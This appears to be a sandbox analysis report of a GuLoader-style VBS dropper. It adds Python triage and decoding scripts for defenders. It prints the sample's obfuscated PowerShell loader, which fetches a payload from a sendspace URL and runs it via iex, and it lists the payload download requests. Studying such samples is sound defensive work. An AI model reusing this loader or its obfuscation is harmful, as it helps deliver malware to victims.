              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. 
PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingueEnstauDjellrBonde=GleamN ,elfe Bifew So.a-ugestOU.d
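The Sigma matches above fire on the first hop only (wscript.exe starting powershell.exe). The process tree in this report shows the whole chain that a process-creation feed (Sysmon Event ID 1, or 4688 with command-line auditing) would record: wscript.exe, then 64-bit powershell.exe with a very long command line, then 32-bit powershell.exe under SysWOW64 with the same argument, then wab.exe. The triage script below is an added example, not part of the report and not a Sigma rule: it runs four heuristics taken from the report's own signatures (script host spawning an interpreter, very long PowerShell command line, 64-bit PowerShell relaunching 32-bit PowerShell, PowerShell launching a non-shell host) over a constructed event list modelled on the tree (PIDs, parents and image paths as listed there; the obfuscated argument replaced by its real prologue plus padding), and reconstructs the ancestry of each hit. The 1000-character threshold and the set of children expected under PowerShell are assumptions to tune per environment.

```python
"""
Process-tree triage for the execution chain shown in this report.
Added example; not part of the sandbox report or of any Sigma rule.
"""
from __future__ import annotations
import ntpath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
INTERPRETERS = {"powershell.exe", "cmd.exe"}
EXPECTED_PS_CHILDREN = {"powershell.exe", "cmd.exe", "conhost.exe"}  # assumption: tune per environment
LONG_CMDLINE = 1000  # characters; assumption. The report's command lines are several KB.

PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"
# Real prologue of the obfuscated argument plus constructed padding standing in
# for the rest of the multi-KB script.
OBF = ("\"$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';"
       + "A" * 4000 + "\"")

# Constructed process-creation events modelled on the report's process tree.
EVENTS = [
    {"pid": 6344, "ppid": 2580, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\time.vbs"'},
    {"pid": 2656, "ppid": 6344, "image": PS64, "cmd": f'"{PS64}" {OBF}'},
    {"pid": 792, "ppid": 2656, "image": r"C:\Windows\system32\conhost.exe",
     "cmd": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 6316, "ppid": 2656, "image": r"C:\Windows\system32\cmd.exe",
     "cmd": r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"'},
    {"pid": 6536, "ppid": 2656, "image": PS32, "cmd": f'"{PS32}" {OBF}'},
    {"pid": 2664, "ppid": 6536, "image": r"C:\Windows\system32\cmd.exe",
     "cmd": r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"'},
    {"pid": 3688, "ppid": 6536, "image": r"C:\Program Files (x86)\windows mail\wab.exe",
     "cmd": r'"C:\Program Files (x86)\windows mail\wab.exe"'},
]


def basename(path):
    """Lower-cased file name of a Windows path (ntpath works on any host OS)."""
    return ntpath.basename(path).lower()


def ancestry(events, pid):
    """Image names from the oldest recorded ancestor down to `pid`."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def triage(events):
    """Return (pid, heuristic name) pairs for every event that trips a heuristic."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        child = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        # 1. Sigma "WScript or CScript Dropper" idea: script host spawns an interpreter.
        if pname in SCRIPT_HOSTS and child in INTERPRETERS:
            hits.append((e["pid"], "script host spawned interpreter"))
        # 2. "Very long command line found": obfuscated script passed as an argument.
        if child == "powershell.exe" and len(e["cmd"]) >= LONG_CMDLINE:
            hits.append((e["pid"], "very long powershell command line"))
        # 3. 64-bit PowerShell re-executing itself as 32-bit (SysWOW64), as in the tree.
        if pname == "powershell.exe" and child == "powershell.exe" and "syswow64" in e["image"].lower():
            hits.append((e["pid"], "64-bit powershell relaunched 32-bit powershell"))
        # 4. PowerShell starting something other than a shell: the injection host (wab.exe here).
        if pname == "powershell.exe" and child not in EXPECTED_PS_CHILDREN:
            hits.append((e["pid"], "powershell launched non-shell host process"))
    return hits


if __name__ == "__main__":
    for pid, why in triage(EVENTS):
        print(f"{pid:5} {why}: {' -> '.join(ancestry(EVENTS, pid))}")
```

Heuristic 4 is the one worth the most attention in a GuLoader case: the report's "Creates a process in suspended mode" and "Writes to foreign memory regions" signatures describe the payload being placed into wab.exe, and a parent-child pair of powershell.exe and wab.exe has no benign reason to occur.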
              No Snort rule has matched


              AV Detection

Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Note: this URL is the IconUri from the manifest of the Pester module bundled with Windows PowerShell 5.1; the github.com/Pester/Pester and apache.org license strings listed further down come from the same manifest, and the nuget.org and contoso.com strings from the bundled PowerShellGet/PackageManagement modules. Their presence in powershell.exe memory is a side effect of module loading, not contact with those hosts. The network indicators this sample actually exercised are the sendspace.com hosts listed below.
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: unknown | HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 69.31.136.53:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb: | source: powershell.exe, 00000004.00000002.2323976689.0000000008840000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ment.Automation.pdb | source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb | source: powershell.exe, 00000004.00000002.2324570247.00000000088C6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 | source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbR | source: powershell.exe, 00000004.00000002.2320193055.0000000007728000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb | source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb | source: powershell.exe, 00000004.00000002.2320193055.0000000007728000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk | source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

              Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox View | IP Address: 69.31.136.57
Source: Joe Sandbox View | IP Address: 69.31.136.53
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected:
    GET /pro/dl/exw2o1 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: www.sendspace.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /dlpro/34b20cf0440cef8a4c2d2511415a2b43/664f6da6/exw2o1/Croutons.xtp HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: fs13n4.sendspace.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /pro/dl/dvbcvt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: www.sendspace.com
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /dlpro/abb1ac42d6f7e317093ecbc9d7acfd44/664f6ddc/dvbcvt/TGFVxUhEOgecNvM13.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Cache-Control: no-cache
    Host: fs12n1.sendspace.com
    Connection: Keep-Alive
    Cookie: SID=kasl9f49sokivj0jd0u0img0e2
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: www.sendspace.com
Source: global traffic | DNS traffic detected: DNS query: fs13n4.sendspace.com
Source: global traffic | DNS traffic detected: DNS query: fs12n1.sendspace.com
Source: powershell.exe, 00000001.00000002.2531372219.0000015C30440000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fs13n4.sendspace.com
Source: powershell.exe, 00000001.00000002.2672896517.0000015C3E291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E221000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2531372219.0000015C30409000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sendspace.com
Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E221000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.2531372219.0000015C3042D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs13n4.sendspaX
Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E75E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C3042D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs13n4.sendspace.com
Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E75A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C30429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C2E75E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C3042D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C30409000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs13n4.sendspace.com/dlpro/34b20cf0440cef8a4c2d2511415a2b43/664f6da6/exw2o1/Croutons.xtp
Source: powershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.2531372219.0000015C2EDAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000001.00000002.2697536992.0000015C468F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.c
              Source: powershell.exe, 00000001.00000002.2672896517.0000015C3E291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E447000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C30250000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com
              Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/exw2o1P
              Source: powershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/exw2o1XR
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.53:443 -> 192.168.2.4:49740 version: TLS 1.2

              System Summary

              Source: amsi64_2656.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_6536.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2656, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6536, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 6908
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 6908
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. 
PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCing
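The PowerShell stage in the command line above builds its real strings at run time: `$Massesamfund` is assembled as 'Su'+'bstrin'+'g' so that `$Thurlsvaflers.$Massesamfund.Invoke($Thurl, $palaverist)` is `Substring($Thurl, 1)`; `Lnkampene` walks each literal from offset 5 in steps of 6 (every sixth character is payload, the five before it are junk) and stops before the final index; and `Kolesterol` runs each decoded block through `& $Maimedly`, which itself decodes to `iex`. The decoder below is an added example, not code from the report or from the sample: it reproduces that loop and pulls every `$name=Lnkampene '...'` assignment out of a script. The four literals embedded in it are copied verbatim from the command line above; the regexes, the `EXCERPT` stitching and the helper names are this example's own.

```python
import re

# Four literals copied verbatim from the PowerShell command line in the report.
LITERALS = {
    "Maimedly": "mudpuiPadeye.rescx Te.t ",
    "Malaxate": "D.bri>Fiske ",
    "Organismers": "LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ",
    "Skadevolderne": (
        "VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag."
        "WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo."
        "etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstw"
        "Slage2LungeoHomel1foreg "
    ),
}


def lnkampene_decode(blob: str, start: int = 5, step: int = 6) -> str:
    """Reproduce the sample's Lnkampene loop.

    PowerShell original:
        For($i=5; $i -lt $blob.Length-1; $i+=6) { $out += $blob.Substring($i, 1) }
    Every sixth character (offsets 5, 11, 17, ...) is payload; the five before it
    are junk. The bound Length-1 means the trailing padding chunk never yields
    a character, which is why each literal ends in a 6-byte filler word.
    """
    return "".join(blob[i] for i in range(start, len(blob) - 1, step))


# `$Name=Lnkampene '...'` with optional spaces around '='. The script never puts a
# single quote inside a literal, so [^']* is sufficient.
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*Lnkampene\s+'([^']*)'")
# Any Lnkampene literal, including the ones passed straight to Kolesterol (...).
LITERAL_RE = re.compile(r"Lnkampene\s+'([^']*)'")


def decode_assignments(script: str) -> dict:
    """Return {variable: decoded string} for every Lnkampene assignment in script."""
    return {name: lnkampene_decode(lit) for name, lit in ASSIGN_RE.findall(script)}


def decode_all_literals(script: str) -> list:
    """Decode every Lnkampene literal in script, in source order."""
    return [lnkampene_decode(lit) for lit in LITERAL_RE.findall(script)]


def dispatcher(decoded: dict) -> str:
    """The script executes each block with `& ($Maimedly) (...)`; resolve that name."""
    return decoded.get("Maimedly", "")


# Constructed excerpt stitching the four literals back into the script's syntax.
EXCERPT = "".join(f"${k}=Lnkampene '{v}';" for k, v in LITERALS.items())

if __name__ == "__main__":
    for name, text in decode_assignments(EXCERPT).items():
        print(f"${name:<14} -> {text!r}")
```

One caveat when copying literals from this page: the rendered report collapses runs of spaces, so a literal that originally contained two adjacent spaces (the Mozilla/5.0 user-agent literal assigned to `$Skovbrandsbekmpelses` is one) decodes with its characters shifted from that point on. Take the literals from the .vbs itself or from the PowerShell process memory dump rather than from the HTML; the four used above contain no double spaces and decode cleanly to `iex`, `>`, `User-Agent` and the sendspace download URL that also appears in the memory strings.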
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B7EC856
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B7ED602
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_08690C98
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_08691568
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_08690950
              Source: time.vbs | Initial sample: Strings found which are bigger than 50
              Source: amsi64_2656.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_6536.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2656, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6536, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@13/9@3/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Omrystninger.Dim
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:792:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Mutant created: \Sessions\1\BaseNamedObjects\MutexPolesskayaGlush*.* svchost.com n X . t N t h ` T 5 ` `
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ipzz4ah.drh.ps1
              Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\time.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2656
